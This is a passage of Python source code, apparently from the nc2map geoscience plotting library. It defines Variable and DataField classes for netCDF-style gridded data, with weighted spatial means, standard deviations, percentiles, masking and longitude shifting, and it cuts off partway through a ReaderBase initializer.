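#   r.lonnames  # -> the single candidate found in r.variables, else None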
def datadim(x):
"""Function returning a property that gets and sets values of x from and
into the dims dictionary"""
def getx(self):
try:
return self.dims[getattr(self, '_DataField'+x)]
except ValueError:
return None
def setx(self, value):
self.dims[getattr(self, '_DataField'+x)] = value
def delx(self):
del self.dims[getattr(self, '_DataField'+x)]
doc = """Data of the %s dimension. See also dims property"""
return property(getx, setx, delx, doc)
def _get_dims(obj):
try:
return obj.dimensions
except AttributeError:
return obj.dims
class GridError(Exception):
pass
class Variable(object):
"""Variable object for an ArrayReader instance. The structure is
essentially the same as for the netCDF4.Variable class.
If var is your Variable instance, the data can be accessed in two ways:
1) via the data attribute var.data (returns the pure numpy array)
2) via __getitem__ var[...]
In case 1), the data is accessed in the usual numpy indexing style (see
http://docs.scipy.org/doc/numpy/reference/arrays.indexing.html) whereas
the second case follows the slicing rules of the netCDF4.Variable class,
allowing one-dimensional boolean and integer sequences. One example (where
lons might be a one-dimensional longitude array) might be
>>> var[::2, [1,3,6], 4, lons>0]
which is not possible for a usual numpy array. The same holds for setting
the data.
Note that using 2) will always create a copy of the data.
Meta information can be accessed via the explicit attribute (e.g.
var.long_name) or via var.meta['long_name']. New meta information can
be set in the same way: var.long_name = 'my long name' or
var.meta['long_name'] = 'my long name'
"""
__slots__ = ['data', 'var', 'dimensions', 'meta', 'name']
@property
def shape(self):
"""Return the shape of data"""
return self.data.shape
@property
def dtype(self):
"""dtype of the variable"""
return self.data.dtype
def __init__(self, data=None, var='var', dims=('time', 'lat', 'lon'),
meta={}):
"""Initialization method for Variable instance
Input:
- data: numpy array
- var: name of the variable
- dims: tuple of dimension names (length of dims must match to
length of data.shape)
- meta: meta data
"""
if data is not None and len(np.shape(data)) != len(tuple(dims)):
try:
raise ValueError((
"Shape of data (%s) and dimensions (%s) do not match!"
% (np.shape(data), dims)))
except:
raise ValueError((
"Shape of data (length %i) and dimensions (length %i) "
"do not match!") % (len(np.shape(data)),
len(tuple(dims))))
if not isinstance(data, np.ndarray):
data = np.asarray(data)
self.data = data
self.var = var
self.name = var
self.dimensions = tuple(dims)
self.meta = OrderedDict(meta).copy()
def __getitem__(self, keys):
"""Set item method of Variable instance. Keys may be integers, slices
or one dimensional integer or boolean arrays.
For example
>>> tempdat = nco.variables['t2m'][::2, [1,3,6], lats>0, lons>0]"""
try:
keys = list(keys)
except TypeError: # non-iterable, i.e. only one slice or integer
return self.data[keys].copy() # make sure that a copy is returned
squeeze = []
for i, key in enumerate(keys):
if isinstance(key, slice):
keys[i] = range(*key.indices(self.shape[i]))
elif isinstance(key, int):
keys[i] = [key]
if self.data.ndim > 1:
squeeze.append(i)
elif np.ndim(key) > 1:
raise IndexError("Index cannot be multidimensional")
if not squeeze:
return self.data[np.ix_(*keys)]
else:
return np.squeeze(self.data[np.ix_(*keys)], squeeze)
def __setitem__(self, keys, value):
"""Set item method of Variable instance. Keys may be integers, slices
or one dimensional integer or boolean arrays.
For example
>>> tempdat = nco.variables['t2m'][::2, [1,3,6], lats>0, lons>0]"""
try:
keys = list(keys)
except TypeError: # non-iterable, i.e. only one slice or integer
self.data[keys] = value
return
squeeze = []
for i, key in enumerate(keys):
if isinstance(key, slice):
keys[i] = range(*key.indices(self.shape[i]))
elif isinstance(key, int):
keys[i] = [key]
squeeze.append(i)
elif np.ndim(key) > 1:
raise IndexError("Index cannot be multidimensional")
if not squeeze:
self.data[np.ix_(*keys)] = value
else:
try:
s = self.data[np.ix_(*keys)].shape
self.data[np.ix_(*keys)] = np.reshape(value, s)
except ValueError:
self.data[np.ix_(*keys)] = value
def __len__(self):
return len(self.data)
def __getattr__(self, attr):
try:
return self.meta[attr]
except KeyError:
raise AttributeError(
"'%s' object has no attribute '%s'" % (
self.__class__.__name__, attr))
def __setattr__(self, attr, value):
if attr not in self.__class__.__slots__:
getattr(self, 'meta')[attr] = value
else:
super(Variable, self).__setattr__(attr, value)
def __dir__(self):
return dir(super(Variable, self)) + self.meta.keys()
def __str__(self):
return repr(self)
def __repr__(self):
strings = [
super(Variable, self).__repr__(),
"%s %s(%s)" % (self.data.dtype, self.var,
', '.join(self.dimensions))]
for item in self.meta.items():
strings.append(" %s: %s" % item)
strings.append("current shape: %s" % str(self.shape))
return '\n'.join(strings)
def _infer_interval_breaks(coord):
"""
>>> _infer_interval_breaks(np.arange(5))
array([-0.5, 0.5, 1.5, 2.5, 3.5, 4.5])
"""
deltas = 0.5 * (coord[1:] - coord[:-1])
first = coord[0] - deltas[0]
last = coord[-1] + deltas[-1]
return np.r_[[first], coord[:-1] + deltas, [last]]
class DataField(object):
"""Multidimensional Data Field with latitude, longitude, time and level
dimension.
    This class is a wrapper around a numpy.ma.MaskedArray instance with
    additional grid information.
Data can be accessed via
>>> mydatafield = DataField(...)
>>> data = mydatafield[:]
Additional attributes:
    - dims: numpy.ndarray containing grid information (e.g. longitude data,
etc.). The information can be accessed via the name of the dimension
(e.g. data.dims['lon']) or data.dims[['lon', 'lat']]
- dimensions: tuple of strings where each string stands for the dimension
the specific axis belongs to
Additional properties:
- grid: returns 2-dimensional longitude- and latitude arrays
- gridweights: Calculate grid weights from longitude and latitude
      information in self.dims
- lon: longitude dimension data
- lat: latitude dimension data
- time: time dimension data
- level: level dimension data
Additional methods:
- mask_outside: masks the data outside of the region of a
mpl_toolkits.basemap.Basemap instance
    - shift_data: shifts the data to match the longitude-latitude
      definitions of a mpl_toolkits.basemap.Basemap instance
- mask_data: masks the data to match a given two-dimensional array with
the same shape as the longitude and latitude dimension
- fldmean: Computes the weighted mean over the longitude-latitude
dimensions (or more)
- fldstd: Computes the weighted standard deviation over the
longitude-latitude dimensions (or more)
- percentiles: Computes the weighted percentile over the
longitude-latitude dimensions (or more)
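    A minimal usage sketch (``nco`` and the variable name are hypothetical):
    >>> field = nco.get_data(var='t2m', datashape='3d')
    >>> ts = field.fldmean()        # weighted mean over lat and lon
    >>> p95 = field.percentile(95)  # weighted 95th percentile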
    """
__slots__ = ['__data', '__lon', '__lat', '__time', 'dims', '__spatial',
'dimensions', '__level', '__var', 'logger', 'triangles']
time = datadim('__time')
level = datadim('__level')
lon = datadim('__lon')
lat = datadim('__lat')
def __init__(self, data, var, dimensions, dims={}, lon='lon', lat='lat',
level='level', time='time', spatial_ax=None, triangles=None):
"""Initialization method of DataField2D instance
Input:
- data: two-dimensional data array
- lon: longitude data
- lat: latitude data
- time: array with time information as datetime instances
- level: array with level informations
- dimensions: dimension names (e.g. ('lat', 'lon')) in the order as
they appear in the shape of data.
- spatial_ax: axes numbers with spatial information (used for
fldmean, etc.)
        - triangles: matplotlib.tri.Triangulation instance for
            unstructured grids"""
self.set_logger()
self.__var = var
self.logger.debug("Input arguments:")
for arg in ['data', 'dimensions']:
self.logger.debug(" %s: %s", arg, type(locals()[arg]))
self.logger.debug("Input dimensions:")
for key, val in dims.iteritems():
self.logger.debug(" %s: %s", key, type(val))
self.__data = data
self.dimensions = list(dimensions)
self.dims = self._dict_to_recarray(dims)
self.check_dims()
self.__lon = str(lon)
self.__lat = str(lat)
self.__level = str(level)
self.__time = str(time)
self.__spatial = spatial_ax
self.triangles = triangles
@property
def grid(self):
"""Tuple (lat2d, lon2d), where lat2d is the 2 dimensional latitude and
lon2d the 2 dimensional longitude corresponding to the data
Input:
- ilat: integer. Latitude axis in data.shape
- ilon: integer. Longitude axis in data.shape
Returns:
lat2d, lon2d
"""
if len(np.shape(self.lat)) > 1 or len(self.__spatial) == 1:
return self.lat, self.lon
else:
ilat = self.dimensions.index(self.__lat)
ilon = self.dimensions.index(self.__lon)
if ilat > ilon:
return np.meshgrid(*map(_infer_interval_breaks,
[self.lon, self.lat]))
else:
return list(
np.roll(np.meshgrid(self.lon, self.lat), 1, axis=0))
@property
def gridweights(self):
"""Calculates weights from latitude and longitude informations.
Please note that latitude and longitude are expected to be in
degrees.
Input:
- ilat: integer. Latitude axis in data.shape
- ilon: integer. Longitude axis in data.shape
Returns:
weights: 2 Dimensional array matching to lat2d and lon2d"""
        if len(self.__spatial) == 1:  # return equal weights
            ispatial = self.__spatial[0]
            weights = np.ma.ones(self.shape)
            weights.mask = self.mask
            # normalize along the spatial axis (keep the axis for
            # broadcasting)
            weights /= np.ma.expand_dims(weights.sum(ispatial), ispatial)
            return weights
lat2d, lon2d = self.grid # may also be 1d if len(self.__spatial) == 1
ilat = self.dimensions.index(self.__lat)
ilon = self.dimensions.index(self.__lon)
ilat_orig = ilat
ilon_orig = ilon
if ilat > ilon:
latslices = [(slice(None), i) for i in [0, 1, -1, -2]]
ilat = 1
lonslices = [(i, slice(None)) for i in [0, 1, -1, -2]]
ilon = 0
else:
latslices = [(i, slice(None)) for i in [0, 1, -1, -2]]
ilat = 0
lonslices = [(slice(None), i) for i in [0, 1, -1, -2]]
ilon = 1
# interpolate to left and right center
new_shape = [1 if i == ilon else lon2d.shape[ilat] for i in xrange(2)]
lon2d = np.append(
np.insert(
lon2d, 0, (2*lon2d.__getitem__(lonslices[0]) -
lon2d.__getitem__(lonslices[1])), axis=ilon),
np.reshape((2*lon2d.__getitem__(lonslices[2]) -
lon2d.__getitem__(lonslices[3])), new_shape),
axis=ilon)
lat2d = np.append(
np.insert(
lat2d, 0, (2*lat2d.__getitem__(lonslices[0]) -
lat2d.__getitem__(lonslices[1])), axis=ilon),
np.reshape((2*lat2d.__getitem__(lonslices[2]) -
lat2d.__getitem__(lonslices[3])), new_shape),
axis=ilon)
# interpolate to upper and lower center
new_shape = [1 if i == ilat else lat2d.shape[ilon] for i in xrange(2)]
lon2d = np.append(
np.insert(
lon2d, 0, (2*lon2d.__getitem__(latslices[0]) -
lon2d.__getitem__(latslices[1])), axis=ilat),
np.reshape((2*lon2d.__getitem__(latslices[2]) -
lon2d.__getitem__(latslices[3])), new_shape),
axis=ilat)
lat2d = np.append(
np.insert(
lat2d, 0, (2*lat2d.__getitem__(latslices[0]) -
lat2d.__getitem__(latslices[1])), axis=ilat),
np.reshape((2*lat2d.__getitem__(latslices[2]) -
lat2d.__getitem__(latslices[3])), new_shape),
axis=ilat)
# calculate centered longitude bounds
lon_bounds = np.array([
np.mean([lon2d[:-2,:-2], lon2d[1:-1,1:-1]], axis=0),
np.mean([lon2d[1:-1,1:-1], lon2d[2:,2:]], axis=0)])*np.pi/180.
# calculate center latitude bounds
lat_bounds = np.array([
np.mean([lat2d[:-2,:-2], lat2d[1:-1,1:-1]], axis=0),
np.mean([lat2d[1:-1,1:-1], lat2d[2:,2:]], axis=0)])*np.pi/180.
weights = np.abs(lon_bounds[0,:] - lon_bounds[1,:])*(
np.sin(lat_bounds[0,:]) - np.sin(lat_bounds[1,:]))
# tile arrays to match
tile_shape = list(self.shape)
tile_shape[ilat_orig] = 1
tile_shape[ilon_orig] = 1
if hasattr(self, 'mask'):
# tile
weights = np.ma.array(np.tile(weights, tile_shape), mask=self.mask)
            # normalize now to account for the mask
for ind in self._iter_indices(ilat_orig, ilon_orig):
weights.__setitem__(
ind,
weights.__getitem__(ind)/weights.__getitem__(ind).sum())
else:
# normalize
weights /= weights.sum()
# tile
weights = np.tile(weights, tile_shape)
if (weights < 0).any():
raise ValueError(
"Found negative weights!")
return weights
def _dict_to_recarray(self, dim_data):
try:
dim_data = dict(dim_data)
except TypeError:
return dim_data
dims = map(str, frozenset(self.dimensions + dim_data.keys()))
data = tuple(np.asarray(dim_data.get(dim)) for dim in dims)
dtypes = [np.asarray(dim_data.get(dim)).dtype for dim in dims]
shapes = [np.asarray(dim_data.get(dim)).shape for dim in dims]
dtype = zip(dims, dtypes, shapes)
return np.array(data, dtype)
def mask_outside(self, mapproj):
"""Mask data outside the boundary of a Basemap instance
Input:
- mapproj: mpl_toolkits.basemap.Basemap instance (or another object
with attributes lonmin, lonmax, latmin and latmax)
"""
self.logger.debug("Mask data to match %s", type(mapproj))
for attr in ['lonmin', 'lonmax', 'latmin', 'latmax']:
self.logger.debug(" %s: %s", attr, getattr(mapproj, attr))
indices = self._iter_indices(*self.__spatial)
lat2d, lon2d = self.grid # may also be 1d if len(self.__spatial) == 1
londata = self.lon
latdata = self.lat
if (londata < mapproj.lonmin).any():
lonminmax = londata[londata < mapproj.lonmin].max()
if (londata > mapproj.lonmax).any():
lonmaxmin = londata[londata > mapproj.lonmax].min()
if (latdata < mapproj.latmin).any():
latminmax = latdata[latdata < mapproj.latmin].max()
if (latdata > mapproj.latmax).any():
latmaxmin = latdata[latdata > mapproj.latmax].min()
for indextuple in indices:
if (londata < mapproj.lonmin).any():
self.__setitem__(
indextuple, np.ma.masked_where(
lon2d < lonminmax, self.__getitem__(indextuple),
copy=True))
if (londata > mapproj.lonmax).any():
self.__setitem__(
indextuple, np.ma.masked_where(
lon2d > lonmaxmin, self.__getitem__(indextuple),
copy=True))
if (latdata < mapproj.latmin).any():
self.__setitem__(
indextuple, np.ma.masked_where(
lat2d < latminmax, self.__getitem__(indextuple),
copy=True))
if (latdata > mapproj.latmax).any():
self.__setitem__(
indextuple, np.ma.masked_where(
lat2d > latmaxmin, self.__getitem__(indextuple),
copy=True))
return self
def _iter_indices(self, *dims):
"""Returns an iterator over all axes except those specified in *dims"""
dims = list(dims)
for i, dim in enumerate(dims):
try:
dims[i] = self.dimensions.index(dim)
except ValueError:
pass
iter_dims = [i for i in xrange(self.ndim) if i not in dims]
        for l in imap(list,
                      product(*(range(self.shape[i]) for i in iter_dims))):
            # re-insert full slices at the excluded axes (ascending order
            # keeps the insertion indices valid)
            for dim in sorted(dims):
                l.insert(dim, slice(None))
            yield tuple(l)
def mask_data(self, mask):
"""Method to mask the data array from a given boolean array. The array
must match to the shape of the longitude and latitude axis"""
indices = self._iter_indices(*self.__spatial)
for indextuple in indices:
self.__setitem__(
indextuple,
np.ma.masked_where(mask, self.__getitem__(indextuple),
copy=True))
return self
def fldmean(self, weights=None, axis='spatial', weighted=True,
keepdims=False):
"""Returns the fldmean over the axis specified by the given dimensions.
Supports masked array.
- weights: alternative weights to use (if None, the
self.gridweights property is used). The shape has to match
self.shape!
- axis: list of dimensions as they are used in self.dimensions or
None, or an integer or tuple of integers standing for the array
axis. If 'spatial', it will be replaced by the spatial axis
- weighted: True or False. If False, no weighting is used and no
weights are computed
- keepdims: bool, optional. If this is set to True, the axes which
are reduced are left in the result as dimensions with size one.
With this option, the result will broadcast correctly against the
original array.
Returns:
            The weighted average over the specified axis.
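        Example (a sketch; ``field`` stands for any DataField instance):
        >>> ts = field.fldmean()                # weighted spatial mean
        >>> ts = field.fldmean(weighted=False)  # plain, unweighted mean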
"""
if not weighted:
weights = None
elif weights is None:
weights = self.gridweights
if np.all(axis == 'spatial'):
axis = self.__spatial
try:
axis = list(axis)
dims = list(self.dimensions)
for i, ax in enumerate(axis):
if ax in dims:
axis[i] = dims.index(ax)
axis = tuple(axis)
except TypeError:
pass
mean = np.ma.average(self[:], weights=weights, axis=axis)
if not keepdims:
return mean
else:
if axis is not None:
new_shape = list(self.shape)
try:
for i in axis:
new_shape[i] = 1
except TypeError:
new_shape[axis] = 1
else:
new_shape = [1] * self.ndim
return mean.reshape(new_shape)
def fldstd(self, weights=None, axis='spatial', weighted=True,
keepdims=False):
"""Returns the standard deviation over the axis specified by the given
dimensions.
Supports masked array.
- weights: alternative weights to use (if None, the
self.gridweights property is used). The shape has to match
self.shape!
- axis: list of dimensions as they are used in self.dimensions or
None, or an integer or tuple of integers standing for the array
axis. If 'spatial', it will be replaced by the spatial axis
- weighted: True or False. If False, no weighting is used and no
weights are computed
- keepdims: bool, optional. If this is set to True, the axes which
are reduced are left in the result as dimensions with size one.
With this option, the result will broadcast correctly against the
original array.
Returns:
            The weighted standard deviation over the specified axis.
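        Example (a sketch; ``field`` stands for any DataField instance):
        >>> sigma = field.fldstd()  # weighted spatial standard deviation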
"""
if not weighted:
weights = None
elif weights is None:
weights = self.gridweights
if np.all(axis == 'spatial'):
axis = self.__spatial
try:
axis = list(axis)
dims = list(self.dimensions)
for i, ax in enumerate(axis):
if ax in dims:
axis[i] = dims.index(ax)
elif ax < 0:
axis[i] += self.ndim
axis = tuple(axis)
except TypeError:
if axis is not None and axis < 0:
axis += self.ndim
if weights is None:
return np.ma.std(self[:], axis=axis)
wtot = weights.sum(axis)
mean = self.fldmean(weights, axis, keepdims=True)
rshape = list(self.shape)
if axis is not None:
try:
for i in xrange(self.ndim):
if i not in axis:
rshape[i] = 1
except TypeError:
for i in xrange(self.ndim):
if i != axis:
rshape[i] = 1
mean = np.tile(mean, rshape)
std = np.ma.sqrt(np.sum(weights*(self[:]-mean)**2, axis=axis)/wtot)
if not keepdims:
return std
else:
if axis is not None:
new_shape = list(self.shape)
try:
for i in axis:
new_shape[i] = 1
except TypeError:
new_shape[axis] = 1
else:
new_shape = [1] * self.ndim
return std.reshape(new_shape)
def percentile(self, q, weights=None, axis='spatial',
keepdims=False, weighted=True):
""" Very close to numpy.percentile, but supports weights and masked
arrays.
Input:
- q: float in range of [0,100] (or sequence of floats)
Percentile to compute which must be between 0 and 100 inclusive.
- weights: alternative weights to use (if None, the
self.gridweights property is used). The shape has to match
self.shape. During the calculation, the weights are normalized
along the specified axis.
- axis: int or sequence of strings and int, optional. Axis along
which the percentiles are computed. Strings must match a name in
self.dimensions. If axis is None, the percentiles are computed
along a flattened version of the array. If 'spatial', it will be
replaced by the spatial axis
- weighted: True or False. If False, no weighting is used and no
weights are computed
- keepdims: bool, optional. If this is set to True, the axes which
are reduced are left in the result as dimensions with size one.
With this option, the result will broadcast correctly against the
original array.
Returns
percentile: scalar or ndarray
            If a single percentile `q` is given and axis=None, a scalar is
            returned. If multiple percentiles `q` are given, an array
            holding the results is returned, listed along the first axis.
            If the input contains integers, or floats of smaller precision
            than 64, then the output data-type is float64. Otherwise, the
            output data-type is the same as that of the input.
            The quantile weights used for computing the percentiles are
            computed via the cumulative sum (nweights being the normalized
            weights):
quantile_weights = np.cumsum(nweights, axis=axis) - 0.5 * nweights
Percentiles are linearly interpolated using the np.interp function.
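        Example (a sketch; ``field`` stands for any DataField instance):
        >>> median = field.percentile(50)
        >>> p5, p95 = field.percentile([5, 95])  # listed along the first axis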
"""
data = self[:].copy()
q = np.array(q, dtype=float).copy()
if not q.ndim:
q = np.array([q])
reduce_shape = True if not keepdims else False
else:
reduce_shape = False
if np.all(axis == 'spatial'):
axis = self.__spatial
try:
axis = list(axis)
dims = list(self.dimensions)
for i, ax in enumerate(axis):
if ax in dims:
axis[i] = dims.index(ax)
axis = tuple(axis)
reshape = True
except TypeError:
reshape = False
        try:
            if axis is not None and axis < 0:
                axis += data.ndim  # convert a negative axis to a positive one
        except TypeError:
            pass
if not weighted:
weights = np.ma.array(np.ones(data.shape), mask=data.mask)
elif weights is None:
weights = self.gridweights
else:
if not np.ndim(weights) == data.ndim or not np.all(
np.shape(weights) == data.shape):
raise ValueError(
"Shape of weights (%s) has to match the shape of data "
"(%s)!" % (np.shape(weights), data.shape))
weights = np.ma.array(weights, mask=data.mask).copy()
if not (np.all(q >= 0) and np.all(q <= 100)):
raise ValueError('q should be in [0, 100]')
if np.any(weights < 0):
raise ValueError('Weights must not be smaller than 0!')
q /= 100.
        if reshape:
            # roll the axes to the front; ascending order keeps the
            # original axis numbers valid during the successive rolls
            for ax in sorted(axis):
                data = np.rollaxis(data[:], ax, 0)
                weights = np.rollaxis(weights[:], ax, 0)
data = data.reshape([np.product(data.shape[:len(axis)])] + list(
data.shape[len(axis):]))
weights = weights.reshape([np.product(weights.shape[:len(axis)])] \
+ list(weights.shape[len(axis):]))
axis = 0
elif axis is not None:
data = np.rollaxis(data[:], axis, 0)
weights = np.rollaxis(weights[:], axis, 0)
axis = 0
if axis is None:
data = data.ravel()
weights = weights.ravel()
sorter = np.ma.argsort(data)
data = data[sorter]
weights = weights[sorter]
else:
sorter = np.ma.argsort(data, axis=axis)
indices = map(list, product(*(
range(ndim) for i, ndim in enumerate(data.shape)
if i != axis)))
for ind in indices:
ind.insert(axis, slice(None))
data.__setitem__(
ind, data.__getitem__(ind)[
sorter.__getitem__(ind)])
weights.__setitem__(
ind, weights.__getitem__(ind)[
sorter.__getitem__(ind)])
weights /= weights.sum(axis) # normalize weights
weights = np.ma.cumsum(weights, axis=axis) - 0.5 * weights
if axis is None:
mask = data.mask == False
pctl = np.interp(q, weights[mask], data[mask])
else:
indices = imap(list, product(*(
range(ndim) for i, ndim in enumerate(data.shape)
if i != axis)))
indices2 = imap(list, product(*(
range(ndim) for i, ndim in enumerate(data.shape)
if i != axis)))
pctl = np.zeros([len(q)] + [
s for i, s in enumerate(data.shape) if i != axis])
for ind1, ind2 in izip(indices, indices2):
ind2.insert(axis, slice(None))
mask = data.mask.__getitem__(ind2) == False
pctl.__setitem__(tuple([slice(None)] + ind1), np.interp(
q, weights.__getitem__(ind2)[mask],
data.__getitem__(ind2)[mask]))
if reduce_shape:
pctl = pctl[0]
return pctl
def shift_data(self, mapproj):
"""Shift the data to match the Basemap instance boundaries
Input:
- mapproj: mpl_toolkits.basemap.Basemap instance (or another object
with attributes lonmin and lonmax)
"""
        def shift_to_larger(indextuple, val):
            """shift to larger longitudes if lonmin < mapproj.lonmin"""
            if lonmax < val:
                data, lon = iter(bm.shiftgrid(
                    lonmax, self.__getitem__(indextuple), lonold))
            else:
                data, lon = self.__getitem__(indextuple), lonold
            # use the possibly pre-shifted data (as in shift_to_smaller)
            shifteddata = iter(bm.shiftgrid(val, data, lon))
            self.__setitem__(indextuple, next(shifteddata))
            self.lon = next(shifteddata)
def shift_to_smaller(indextuple, val):
"""shift to smaller longitudes if lonmax > mapproj.lonmax"""
if lonmin > val:
data, lon = iter(bm.shiftgrid(
lonmin, self.__getitem__(indextuple), lonold,
start=False))
else:
data, lon = self.__getitem__(indextuple), lonold
shifteddata = iter(bm.shiftgrid(
val, data, lon,
start=False))
self.__setitem__(indextuple, next(shifteddata))
self.lon = next(shifteddata)
self.logger.debug("Shift data to match %s", type(mapproj))
# shift data
if len(self.lon.shape) == 1:
self.logger.debug(" Longitude is 1d --> shift")
if len(self.__spatial) == 1:
self.logger.debug(
" Found one-dimensional data --> ")
if mapproj.lonmin < 0:
self.logger.debug(" decrease all > 180.")
self.lon[self.lon > 180.] -= 360.
elif mapproj.lonmax > 180.:
self.logger.debug(" increase all < 0.")
self.lon[self.lon < 0.] += 360.
return self
# shiftgrid does only support 2 dimensional arrays. Therefore we
# loop through the other indices
indices = imap(list, product(*(
range(ndim) for i, ndim in enumerate(self.shape)
if self.dimensions[i] not in [self.__lat, self.__lon])))
lonold = self.lon.copy()
lonmin = lonold.min()
lonmax = lonold.max()
self.logger.debug(" Minimum longitude of data: %s", lonmin)
self.logger.debug(" Minimum longitude of Basemap: %s",
mapproj.lonmin)
self.logger.debug(" Maximal longitude of data: %s", lonmax)
self.logger.debug(" Maximal longitude of Basemap: %s",
mapproj.lonmax)
if lonmin <= mapproj.lonmin:
val = lonold[lonold <= mapproj.lonmin].max()
self.logger.debug(" --> Shift to the right to %s", val)
shift = lambda indextuple: shift_to_larger(indextuple, val)
shift_lon = True
elif lonmax >= mapproj.lonmax:
val = lonold[lonold >= mapproj.lonmax].min()
self.logger.debug(" --> Shift to the left to %s", val)
shift = lambda indextuple: shift_to_smaller(indextuple, val)
shift_lon = True
else:
self.logger.debug(" Longitude 1d but no shift necessary")
shift_lon = False
ilat = self.dimensions.index(self.__lat)
ilon = self.dimensions.index(self.__lon)
if shift_lon:
for i, indextuple in enumerate(indices):
indextuple.insert(ilat, slice(None))
indextuple.insert(ilon, slice(None))
shift(indextuple)
self.logger.debug(" Performed shifts in total: %i", i+1)
else:
self.logger.debug(" Longitude is not 1d --> no shift")
return self
def __getitem__(self, key):
return self.__data[key]
def __setitem__(self, key, item):
self.__data[key] = item
    def __getattr__(self, attr):
        # only called when the standard lookup fails --> delegate to the
        # wrapped data array (guard against recursion during __init__)
        try:
            data = object.__getattribute__(self, '_DataField__data')
        except AttributeError:
            raise AttributeError(attr)
        return getattr(data, attr)
def __dir__(self):
return dir(super(DataField, self)) + dir(self.__data)
    def __len__(self):
        return len(self.__data)
    def __repr__(self):
        return "<%i-dimensional DataField instance of %s>" % (
            len(self.dimensions), self.__var)
    def __str__(self):
        return repr(self)[1:-1]
def check_dims(self, raise_error=False):
"""Function to check whether the data, it's shape and the given
dimensions match."""
shape = self.__data.shape
nshape = len(shape)
ndims = len(self.dimensions)
self.logger.debug("Checking dimensions and shapes")
self.logger.debug("Dimensions: %s", ', '.join(self.dimensions))
if nshape != ndims:
msg = (
"Shape of data (%i) does not match to shape of specified "
"dimensions (%i)!") % (nshape, ndims)
if raise_error:
                raise ValueError(msg)
else:
critical(msg, logger=self.logger)
for idim, dim in enumerate(self.dimensions):
try:
dimlen = len(self.dims[dim])
if shape[idim] != dimlen:
msg = (
"Length of dimensions data for %s (%i) does not match "
"to the shape (%i).") % (dim, dimlen, shape[idim])
if raise_error:
                        raise ValueError(msg)
else:
critical(msg, logger=self.logger)
except (KeyError, TypeError):
msg = "Did not find dimension %s in dimension data!" % dim
if raise_error:
raise ValueError(msg)
else:
critical(msg, logger=self.logger)
def set_logger(self, name=None, force=False):
"""This function sets the logging.Logger instance in the MapsManager
instance.
Input:
- name: name of the Logger (if None: it will be named like
<module name>.<class name>)
- force: True/False (Default: False). If False, do not set it if the
instance has already a logger attribute."""
if name is None:
name = '%s.%s' % (self.__module__, self.__class__.__name__)
if not hasattr(self, 'logger') or force:
self.logger = logging.getLogger(name)
self.logger.debug('Initializing...')
class ReaderBase(object):
"""Base class defining the principle methods for nc2map.readers
Parameters
----------
meta: dict
Global meta data of the ArrayReader instance
timenames: set of strings
Dimension and variable names that shall be considered as time
dimension or variable
levelnames: set of strings
Dimension and variable names that shall be considered as level
dimension or variable
lonnames: set of strings
Dimension and variable names that shall be considered as longitude
dimension or variable
latnames: set of strings
Dimension and variable names that shall be considered as latitude
dimension or variable
    udims: set of strings
        Dimension names that indicate that the variable is defined on an
        unstructured grid
    ufuncs: list
        list containing interpretation instances for unstructured grids
        (see below). Default grid interpretation instances are for
        the ugrid conventions of triangular grids and for the ICON grid.
**data
var={'data': arr, 'dims': (dim1, dim2, ...)}}
var is a string standing for the variable name,
value of 'data' is the data array of the variable, value of
'dims' is a list of dimension names. Each dimension name must
correspond to the specific axes in arr.shape
Attributes
----------
lonnames: name of the longitude variable
lon: longitude variable
latnames: name of the latitude variable
lat: latitude variable
timenames: name of the time variable
time: time variable
levelnames: name of the level variable
level: level variable
    udims: set of dimensions that identify an unstructured variable
    ufuncs: list of instances that are used for the interpretation of an
        unstructured grid
variables: dictionary containing the variables
Notes
-----
    instances in `ufuncs` must have a get_triangles method accepting three
parameters: a reader, a variable and a boolean. They must furthermore
return the centered longitudes, latitudes and a
matplotlib.tri.Triangulation instance with the triangle definitions.
See Also
--------
nc2map.readers.get_triangle_ugrid: interpretation function for UGRID
convention
nc2map.readers.get_triangle_icon: ICON interpretation function"""
# ----- property definitions
lon = dimprop('lon', "Longitude variable (if found)")
lat = dimprop('lat', "Latitude variable (if found)")
time = dimprop('time', "Time variable data (if found)")
level = dimprop('level', "Level variable data (if found)")
timenames = dimlist('timenames')
levelnames = dimlist('levelnames')
latnames = dimlist('latnames')
lonnames = dimlist('lonnames')
@property
def lola_variables(self):
"""Dictionary with variables containing longitude and latitude
dimension"""
return OrderedDict([
item for item in self.variables.items()
if ((self._lonnames.intersection(_get_dims(item[1])) and
self._latnames.intersection(_get_dims(item[1]))) or
self._udim(item[1])) and
item[0] not in [self.lonnames, self.latnames]])
@property
def grid_variables(self):
"""Dictionary with variables being latitude, longitude, time or
level. Latitude dimension is stored in lat, longitude in lon, time
in time and level in level."""
        dimensions = frozenset(chain(*(
            _get_dims(var) for var in self.variables.values())))
        return OrderedDict([
            (var, self.variables.get(var)) for var in dimensions
            if var in self.variables])
@property
def time_variables(self):
"""Dictionary with variables containing the time dimension"""
return OrderedDict([
item for item in self.variables.items()
if self.timenames in _get_dims(item[1])])
@property
def level_variables(self):
"""Dictionary with variables containing the time dimension"""
return OrderedDict([
item for item in self.variables.items()
if self.levelnames in _get_dims(item[1])])
@property
def dttime(self):
"""Time array with datetime.datetime instances"""
time = self.time
if time is None:
raise ValueError("Could not find time variable with name %s" %
self._timenames)
return self.convert_time(self.time, self.timenames)
def __init__(self, meta={}, timenames=defaultnames['timenames'],
levelnames=defaultnames['levelnames'],
lonnames=defaultnames['lonnames'],
latnames=defaultnames['latnames'],
udims=defaultnames['udims'], ufuncs=ufuncs,
**data):
"""Initialization method for ArrayReader instance
Parameters
----------
meta: dict
Global meta data of the ArrayReader instance
timenames: set of strings
Dimension and variable names that shall be considered as time
dimension or variable
levelnames: set of strings
Dimension and variable names that shall be considered as level
dimension or variable
lonnames: set of strings
Dimension and variable names that shall be considered as longitude
dimension or variable
latnames: set of strings
Dimension and variable names that shall be considered as latitude
dimension or variable
        udims: set of strings
            Dimension names that indicate that the variable is defined on
            an unstructured grid
        ufuncs: list
            list containing interpretation instances for unstructured
            grids (see below). Default grid interpretation instances are
            for the ugrid conventions of triangular grids and for the
            ICON grid.
**data
var={'data': arr, 'dims': (dim1, dim2, ...)}}
var is a string standing for the variable name,
value of 'data' is the data array of the variable, value of
'dims' is a list of dimension names. Each dimension name must
correspond to the specific axes in arr.shape
Notes
-----
instances in `ufunc` must have a get_triangles method that accepts
three parameters, a reader, a variable and a boolean. They must
furthermore return the centered longitudes, latitudes and a
matplotlib.tri.Triangulation instance with the triangle definitions.
        If they cannot interpret the grid, a
:class:`~nc2map.readers.GridError` should be raised.
See Also
--------
nc2map.readers.get_triangle_ugrid: interpretation function for UGRID
convention
nc2map.readers.get_triangle_icon: ICON interpretation function
"""
self.set_logger()
self.timenames = timenames
self.levelnames = levelnames
self.lonnames = lonnames
